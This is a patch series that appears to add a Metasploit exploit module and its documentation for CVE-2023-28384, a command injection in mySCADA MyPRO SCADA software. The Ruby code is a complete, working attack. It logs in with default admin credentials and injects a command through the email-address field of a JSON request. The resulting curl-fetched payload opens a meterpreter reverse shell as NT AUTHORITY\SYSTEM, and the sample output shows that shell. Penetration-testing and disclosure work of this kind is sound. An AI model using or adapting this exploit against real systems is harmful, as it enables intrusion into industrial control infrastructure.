From 2bdba1a48deab166bd7ae41289fc46c337a7367c Mon Sep 17 00:00:00 2001 From: h4x-x0r Date: Mon, 22 Jul 2024 16:46:37 -0400 Subject: [PATCH 1/8] Documentation for the MyPRO Command Injection (CVE-2023-28384) Module. --- .../exploit/windows/scada/mypro_cmdexe.md | 75 +++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100644 documentation/modules/exploit/windows/scada/mypro_cmdexe.md diff --git a/documentation/modules/exploit/windows/scada/mypro_cmdexe.md b/documentation/modules/exploit/windows/scada/mypro_cmdexe.md new file mode 100644 index 000000000000..45745a1f7366 --- /dev/null +++ b/documentation/modules/exploit/windows/scada/mypro_cmdexe.md @@ -0,0 +1,75 @@ +## Vulnerable Application + +**Vulnerability Description** + +This module exploits a command injection vulnerability in mySCADA MyPRO <= v8.28.0 (CVE-2023-28384). + +An authenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of `NT AUTHORITY\SYSTEM`. +This module uses the default admin:admin credentials, but any account configured on the system can be used to exploit this issue. + +Versions <= 8.28.0 are affected. CISA published [ICSA-23-096-06](https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06) to cover the security issues. The official changelog for the updated version, v8.29.0, is available [here](https://web.archive.org/web/20230320130928/https://www.myscada.org/changelog/?section=version-8-29-0), although it only mentions a "General security improvement" without further details. + +**Vulnerable Application Installation** + +A trial version of the software can be obtained from [the vendor](http://nsa.myscada.org/myPRO/WIN/myPRO_x64_8.28.0.exe). +For the product to work correctly, the project and log directories need to be configured first, which can be done through the web inteface (navigate to System > Storage). + +**Successfully tested on** + +- mySCADA MyPRO 8.28.0 on Windows 10 22H2 +- mySCADA MyPRO 8.27.0 on Windows 10 22H2 +- mySCADA MyPRO 8.26.0 on Windows 10 22H2 + +## Verification Steps + +1. Install the application +2. Configure the project and log paths (System > Storage in the web interface, running by default on TCP ports 80 & 443) +3. Start `msfconsole` and run the following commands: + +``` +msf6 > use exploit/windows/scada/mypro_cmdexe +[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp +msf6 exploit(windows/scada/mypro_cmdexe) > set RHOSTS +msf6 exploit(windows/scada/mypro_cmdexe) > exploit +``` + +You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`. + +## Options +**USERNAME** + +The username of a MyPRO user (default: admin) + +**PASSWORD** + +The associated password of the MyPRO user (default: admin) + +## Scenarios + +Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the following: + +``` +msf6 exploit(windows/scada/mypro_cmdexe) > exploit + +[*] Started reverse TCP handler on 192.168.1.241:4444 +[*] Checking MyPRO version... +[+] Version retrieved: 8.28.0 +[+] Version is vulnerable. +[*] Checking credentials... +[+] Credentials are working. +[*] Sending command injection... +[*] Using randomly generated email address: UUuZCNFXIghJ@Lbruq.com +[*] Sending stage (201798 bytes) to 192.168.1.239 +[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.239:49303) at 2024-07-22 16:17:57 -0400 +[*] Exploit finished, check thy shell. + +meterpreter > shell +Process 9252 created. +Channel 1 created. +Microsoft Windows [Version 10.0.19045.4651] +(c) Microsoft Corporation. All rights reserved. + +C:\WINDOWS\system32>whoami +whoami +nt authority\system +``` \ No newline at end of file From d7e50cb1268226c3465e38058e250ceaeb45a77d Mon Sep 17 00:00:00 2001 From: h4x-x0r Date: Mon, 22 Jul 2024 16:49:40 -0400 Subject: [PATCH 2/8] mySCADA MyPRO <= v8.28.0 Command Injection (CVE-2023-28384) exploit module --- .../exploits/windows/scada/mypro_cmdexe.rb | 174 ++++++++++++++++++ 1 file changed, 174 insertions(+) create mode 100644 modules/exploits/windows/scada/mypro_cmdexe.rb diff --git a/modules/exploits/windows/scada/mypro_cmdexe.rb b/modules/exploits/windows/scada/mypro_cmdexe.rb new file mode 100644 index 000000000000..45f0ed9fe4da --- /dev/null +++ b/modules/exploits/windows/scada/mypro_cmdexe.rb @@ -0,0 +1,174 @@ +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)', + 'Description' => %q{ + Authenticated Command Injection in MyPRO <= v8.28.0 from mySCADA. + The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM. + }, + 'License' => MSF_LICENSE, + 'Author' => ['Michael Heinzl'], # Vulnerability discovery & MSF module + 'References' => [ + [ 'URL', 'https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06'], + [ 'CVE', '2023-28384'] + ], + 'DisclosureDate' => '2022-09-22', + 'Platform' => 'win', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Targets' => [ + [ + 'Windows_Fetch', + { + 'Arch' => [ ARCH_CMD ], + 'Platform' => 'win', + 'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' }, + 'Type' => :win_fetch + } + ] + ], + 'DefaultTarget' => 0, + + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] + } + ) + ) + + register_options( + [ + OptString.new( + 'USERNAME', + [ true, 'The username to authenticate with (default: admin)', 'admin' ] + ), + OptString.new( + 'PASSWORD', + [ true, 'The password to authenticate with (default: admin)', 'admin' ] + ), + OptString.new( + 'TARGETURI', + [ true, 'The URI for the MyPRO web interface', '/' ] + ) + ] + ) + end + + def exploit + connect + case target['Type'] + when :win_fetch + execute_command(payload.encoded) + end + end + + def execute_command(cmd, _opts = {}) + print_status('Checking MyPRO version...') + check_version + print_status('Checking credentials...') + check_auth + print_status('Sending command injection...') + exec_mypro(cmd) + print_status('Exploit finished, check thy shell.') + handler + end + + # Determine if the MyPRO instance runs a vulnerable version + def check_version + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'l.fcgi'), + 'vars_post' => { + 't' => '98' + } + }) + + unless res + fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') + + end + if res && res.code == 200 + regex = /\{.*\}/m + json_body = res.body[regex, 0] + data = JSON.parse(json_body) + version = data['V'] + if version.nil? + fail_with(Failure::Unknown, 'Version missing from server response.') + else + print_good('Version retrieved: ' + version) + end + + parts = version.split('.') + major = parts[0] + minor = parts[1] + if major.to_i == 8 && minor.to_i <= 28 + print_good('Version is vulnerable.') + else + fail_with(Failure::NotVulnerable, 'Version is not vulnerable.') + end + else + fail_with(Failure::Unknown, 'Unexpected server response received.') + end + end + + # Check if credentials are working + def check_auth + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'sss2'), + 'headers' => { + 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) + } + }) + + unless res + fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') + end + if res && res.code == 401 + fail_with(Failure::NoAccess, 'Unauthorized access. Are your credentials correct?') + end + if res && res.code == 200 + print_good('Credentials are working.') + end + end + + # Send command injection + def exec_mypro(cmd) + # Generating a random email address + addr = "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com" + + print_status("Using randomly generated email address: #{addr}") + + post_data = { + 'type' => 'sendEmail', + 'addr' => 'addr' + '"&&' + cmd + } + post_json = JSON.generate(post_data) + + res = send_request_cgi({ + 'method' => 'POST', + 'ctype' => 'application/json', + 'data' => post_json, + 'uri' => normalize_uri(target_uri.path, 'sss2'), + 'headers' => { + 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) + } + + }) + + # unless res # We don't fail from this check because the server will wait until the injected command got executed before returning a response. Typically, this will simply result in a 504 Gateway Time-out error after some time, but there is no indication on whether the injected payload got successfully executed or not from the server response. + # print_status("Failed to receive a reply from the server, probably waiting on injected command to finish. Check if you got a shell already.") + # end + + if res && res.code == 200 # If the injected command executed and terminated within the timeout, a HTTP status code of 200 is returned. + print_good('Command successfully executed, check your shell.') + end + end + +end From 9bfaf6343ab99f4b82b2811321ae3ee29bd38c5d Mon Sep 17 00:00:00 2001 From: h4x-x0r Date: Tue, 23 Jul 2024 23:48:32 -0400 Subject: [PATCH 3/8] Updated the module to take advantage of the check method --- .../modules/exploit/windows/scada/mypro_cmdexe.md | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/documentation/modules/exploit/windows/scada/mypro_cmdexe.md b/documentation/modules/exploit/windows/scada/mypro_cmdexe.md index 45745a1f7366..e9f3996f8f40 100644 --- a/documentation/modules/exploit/windows/scada/mypro_cmdexe.md +++ b/documentation/modules/exploit/windows/scada/mypro_cmdexe.md @@ -52,19 +52,18 @@ Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fe msf6 exploit(windows/scada/mypro_cmdexe) > exploit [*] Started reverse TCP handler on 192.168.1.241:4444 -[*] Checking MyPRO version... -[+] Version retrieved: 8.28.0 -[+] Version is vulnerable. +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. [*] Checking credentials... [+] Credentials are working. [*] Sending command injection... -[*] Using randomly generated email address: UUuZCNFXIghJ@Lbruq.com +[*] Using randomly generated email address: VfzbSXcISaX@fNavXU.com [*] Sending stage (201798 bytes) to 192.168.1.239 -[*] Meterpreter session 1 opened (192.168.1.241:4444 -> 192.168.1.239:49303) at 2024-07-22 16:17:57 -0400 +[*] Meterpreter session 12 opened (192.168.1.241:4444 -> 192.168.1.239:57382) at 2024-07-23 23:38:12 -0400 [*] Exploit finished, check thy shell. meterpreter > shell -Process 9252 created. +Process 2632 created. Channel 1 created. Microsoft Windows [Version 10.0.19045.4651] (c) Microsoft Corporation. All rights reserved. From c1bf8df690b87a3bed5e4314ff8f97407809e124 Mon Sep 17 00:00:00 2001 From: h4x-x0r Date: Tue, 23 Jul 2024 23:52:05 -0400 Subject: [PATCH 4/8] Updated the module to take advantage of the check method --- .../exploits/windows/scada/mypro_cmdexe.rb | 74 +++++++++---------- 1 file changed, 37 insertions(+), 37 deletions(-) diff --git a/modules/exploits/windows/scada/mypro_cmdexe.rb b/modules/exploits/windows/scada/mypro_cmdexe.rb index 45f0ed9fe4da..932786c28816 100644 --- a/modules/exploits/windows/scada/mypro_cmdexe.rb +++ b/modules/exploits/windows/scada/mypro_cmdexe.rb @@ -1,7 +1,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::CmdStager + prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( @@ -60,63 +60,63 @@ def initialize(info = {}) ) end - def exploit - connect - case target['Type'] - when :win_fetch - execute_command(payload.encoded) - end - end - - def execute_command(cmd, _opts = {}) - print_status('Checking MyPRO version...') - check_version - print_status('Checking credentials...') - check_auth - print_status('Sending command injection...') - exec_mypro(cmd) - print_status('Exploit finished, check thy shell.') - handler - end - # Determine if the MyPRO instance runs a vulnerable version - def check_version - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 'l.fcgi'), - 'vars_post' => { - 't' => '98' - } - }) - - unless res - fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') - + def check + begin + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'l.fcgi'), + 'vars_post' => { + 't' => '98' + } + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + return CheckCode::Unknown + ensure + disconnect end + if res && res.code == 200 regex = /\{.*\}/m json_body = res.body[regex, 0] data = JSON.parse(json_body) version = data['V'] if version.nil? - fail_with(Failure::Unknown, 'Version missing from server response.') + return CheckCode::Unknown else - print_good('Version retrieved: ' + version) + vprint_status('Version retrieved: ' + version) end parts = version.split('.') major = parts[0] minor = parts[1] if major.to_i == 8 && minor.to_i <= 28 - print_good('Version is vulnerable.') + return CheckCode::Appears else - fail_with(Failure::NotVulnerable, 'Version is not vulnerable.') + return CheckCode::Safe end else - fail_with(Failure::Unknown, 'Unexpected server response received.') + return CheckCode::Unknown end end + def exploit + connect + case target['Type'] + when :win_fetch + execute_command(payload.encoded) + end + end + + def execute_command(cmd) + print_status('Checking credentials...') + check_auth + print_status('Sending command injection...') + exec_mypro(cmd) + print_status('Exploit finished, check thy shell.') + handler + end + # Check if credentials are working def check_auth res = send_request_cgi({ From ddc13bc58fb6bc730f9171df80a95f30f7161aad Mon Sep 17 00:00:00 2001 From: h4x-x0r <152236528+h4x-x0r@users.noreply.github.com> Date: Wed, 24 Jul 2024 20:52:40 -0500 Subject: [PATCH 5/8] Update modules/exploits/windows/scada/mypro_cmdexe.rb Co-authored-by: Diego Ledda --- modules/exploits/windows/scada/mypro_cmdexe.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/scada/mypro_cmdexe.rb b/modules/exploits/windows/scada/mypro_cmdexe.rb index 932786c28816..b0837ca8541d 100644 --- a/modules/exploits/windows/scada/mypro_cmdexe.rb +++ b/modules/exploits/windows/scada/mypro_cmdexe.rb @@ -20,7 +20,7 @@ def initialize(info = {}) ], 'DisclosureDate' => '2022-09-22', 'Platform' => 'win', - 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Arch' => [ ARCH_CMD ], 'Targets' => [ [ 'Windows_Fetch', From c8feb5c5e640edfa69b143a370424f593be5703f Mon Sep 17 00:00:00 2001 From: h4x-x0r Date: Wed, 24 Jul 2024 22:40:00 -0400 Subject: [PATCH 6/8] Updated formatting --- .../exploit/windows/scada/mypro_cmdexe.md | 20 ++++++++++++------- 1 file changed, 13 insertions(+), 7 deletions(-) diff --git a/documentation/modules/exploit/windows/scada/mypro_cmdexe.md b/documentation/modules/exploit/windows/scada/mypro_cmdexe.md index e9f3996f8f40..b450d29ed2cb 100644 --- a/documentation/modules/exploit/windows/scada/mypro_cmdexe.md +++ b/documentation/modules/exploit/windows/scada/mypro_cmdexe.md @@ -4,15 +4,20 @@ This module exploits a command injection vulnerability in mySCADA MyPRO <= v8.28.0 (CVE-2023-28384). -An authenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of `NT AUTHORITY\SYSTEM`. +An authenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of +`NT AUTHORITY\SYSTEM`. This module uses the default admin:admin credentials, but any account configured on the system can be used to exploit this issue. -Versions <= 8.28.0 are affected. CISA published [ICSA-23-096-06](https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06) to cover the security issues. The official changelog for the updated version, v8.29.0, is available [here](https://web.archive.org/web/20230320130928/https://www.myscada.org/changelog/?section=version-8-29-0), although it only mentions a "General security improvement" without further details. +Versions <= 8.28.0 are affected. CISA published [ICSA-23-096-06](https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06) to cover +the security issues. The official changelog for the updated version, v8.29.0, is available +[here](https://web.archive.org/web/20230320130928/https://www.myscada.org/changelog/?section=version-8-29-0), although it only mentions a +"General security improvement" without further details. **Vulnerable Application Installation** A trial version of the software can be obtained from [the vendor](http://nsa.myscada.org/myPRO/WIN/myPRO_x64_8.28.0.exe). -For the product to work correctly, the project and log directories need to be configured first, which can be done through the web inteface (navigate to System > Storage). +For the product to work correctly, the project and log directories need to be configured first, which can be done through the web inteface +(navigate to System > Storage). **Successfully tested on** @@ -36,17 +41,18 @@ msf6 exploit(windows/scada/mypro_cmdexe) > exploit You should get a meterpreter session in the context of `NT AUTHORITY\SYSTEM`. ## Options -**USERNAME** +### USERNAME The username of a MyPRO user (default: admin) -**PASSWORD** +### PASSWORD The associated password of the MyPRO user (default: admin) ## Scenarios -Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the following: +Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the +following: ``` msf6 exploit(windows/scada/mypro_cmdexe) > exploit @@ -71,4 +77,4 @@ Microsoft Windows [Version 10.0.19045.4651] C:\WINDOWS\system32>whoami whoami nt authority\system -``` \ No newline at end of file +``` From 90ed8ae79769ed6241802321fbaae2fcd805f3cd Mon Sep 17 00:00:00 2001 From: h4x-x0r Date: Wed, 24 Jul 2024 22:40:26 -0400 Subject: [PATCH 7/8] Revised the code to make it cleaner --- .../exploits/windows/scada/mypro_cmdexe.rb | 36 +++++++------------ 1 file changed, 12 insertions(+), 24 deletions(-) diff --git a/modules/exploits/windows/scada/mypro_cmdexe.rb b/modules/exploits/windows/scada/mypro_cmdexe.rb index 932786c28816..4573bb7f260a 100644 --- a/modules/exploits/windows/scada/mypro_cmdexe.rb +++ b/modules/exploits/windows/scada/mypro_cmdexe.rb @@ -20,7 +20,7 @@ def initialize(info = {}) ], 'DisclosureDate' => '2022-09-22', 'Platform' => 'win', - 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Arch' => [ ARCH_CMD ], 'Targets' => [ [ 'Windows_Fetch', @@ -72,14 +72,10 @@ def check }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError return CheckCode::Unknown - ensure - disconnect end if res && res.code == 200 - regex = /\{.*\}/m - json_body = res.body[regex, 0] - data = JSON.parse(json_body) + data = res.get_json_document version = data['V'] if version.nil? return CheckCode::Unknown @@ -87,10 +83,7 @@ def check vprint_status('Version retrieved: ' + version) end - parts = version.split('.') - major = parts[0] - minor = parts[1] - if major.to_i == 8 && minor.to_i <= 28 + if Rex::Version.new(version) <= Rex::Version.new('8.28') return CheckCode::Appears else return CheckCode::Safe @@ -101,11 +94,7 @@ def check end def exploit - connect - case target['Type'] - when :win_fetch - execute_command(payload.encoded) - end + execute_command(payload.encoded) end def execute_command(cmd) @@ -114,7 +103,6 @@ def execute_command(cmd) print_status('Sending command injection...') exec_mypro(cmd) print_status('Exploit finished, check thy shell.') - handler end # Check if credentials are working @@ -130,11 +118,13 @@ def check_auth unless res fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') end - if res && res.code == 401 - fail_with(Failure::NoAccess, 'Unauthorized access. Are your credentials correct?') - end - if res && res.code == 200 + case res.code + when 200 print_good('Credentials are working.') + when 401 + fail_with(Failure::NoAccess, 'Unauthorized access. Are your credentials correct?') + else + fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.') end end @@ -147,7 +137,7 @@ def exec_mypro(cmd) post_data = { 'type' => 'sendEmail', - 'addr' => 'addr' + '"&&' + cmd + 'addr' => "addr\"&&#{cmd}" } post_json = JSON.generate(post_data) @@ -162,9 +152,7 @@ def exec_mypro(cmd) }) - # unless res # We don't fail from this check because the server will wait until the injected command got executed before returning a response. Typically, this will simply result in a 504 Gateway Time-out error after some time, but there is no indication on whether the injected payload got successfully executed or not from the server response. - # print_status("Failed to receive a reply from the server, probably waiting on injected command to finish. Check if you got a shell already.") - # end + # We don't fail if no response is received, as the server will wait until the injected command got executed before returning a response. Typically, this will simply result in a 504 Gateway Time-out error after some time, but there is no indication on whether the injected payload got successfully executed or not from the server response. if res && res.code == 200 # If the injected command executed and terminated within the timeout, a HTTP status code of 200 is returned. print_good('Command successfully executed, check your shell.') From 14945679ba72d5a3000ec7e3e606e5e792404fbb Mon Sep 17 00:00:00 2001 From: h4x-x0r Date: Thu, 25 Jul 2024 23:54:27 -0400 Subject: [PATCH 8/8] Updated email generation part. --- .../modules/exploit/windows/scada/mypro_cmdexe.md | 1 - modules/exploits/windows/scada/mypro_cmdexe.rb | 9 ++------- 2 files changed, 2 insertions(+), 8 deletions(-) diff --git a/documentation/modules/exploit/windows/scada/mypro_cmdexe.md b/documentation/modules/exploit/windows/scada/mypro_cmdexe.md index b450d29ed2cb..b52f0f58d97a 100644 --- a/documentation/modules/exploit/windows/scada/mypro_cmdexe.md +++ b/documentation/modules/exploit/windows/scada/mypro_cmdexe.md @@ -63,7 +63,6 @@ msf6 exploit(windows/scada/mypro_cmdexe) > exploit [*] Checking credentials... [+] Credentials are working. [*] Sending command injection... -[*] Using randomly generated email address: VfzbSXcISaX@fNavXU.com [*] Sending stage (201798 bytes) to 192.168.1.239 [*] Meterpreter session 12 opened (192.168.1.241:4444 -> 192.168.1.239:57382) at 2024-07-23 23:38:12 -0400 [*] Exploit finished, check thy shell. diff --git a/modules/exploits/windows/scada/mypro_cmdexe.rb b/modules/exploits/windows/scada/mypro_cmdexe.rb index 4573bb7f260a..d80876f5cb7e 100644 --- a/modules/exploits/windows/scada/mypro_cmdexe.rb +++ b/modules/exploits/windows/scada/mypro_cmdexe.rb @@ -37,7 +37,7 @@ def initialize(info = {}) 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], - 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] + 'SideEffects' => [IOC_IN_LOGS] } ) ) @@ -130,14 +130,9 @@ def check_auth # Send command injection def exec_mypro(cmd) - # Generating a random email address - addr = "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com" - - print_status("Using randomly generated email address: #{addr}") - post_data = { 'type' => 'sendEmail', - 'addr' => "addr\"&&#{cmd}" + 'addr' => "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com\"&&#{cmd}" } post_json = JSON.generate(post_data)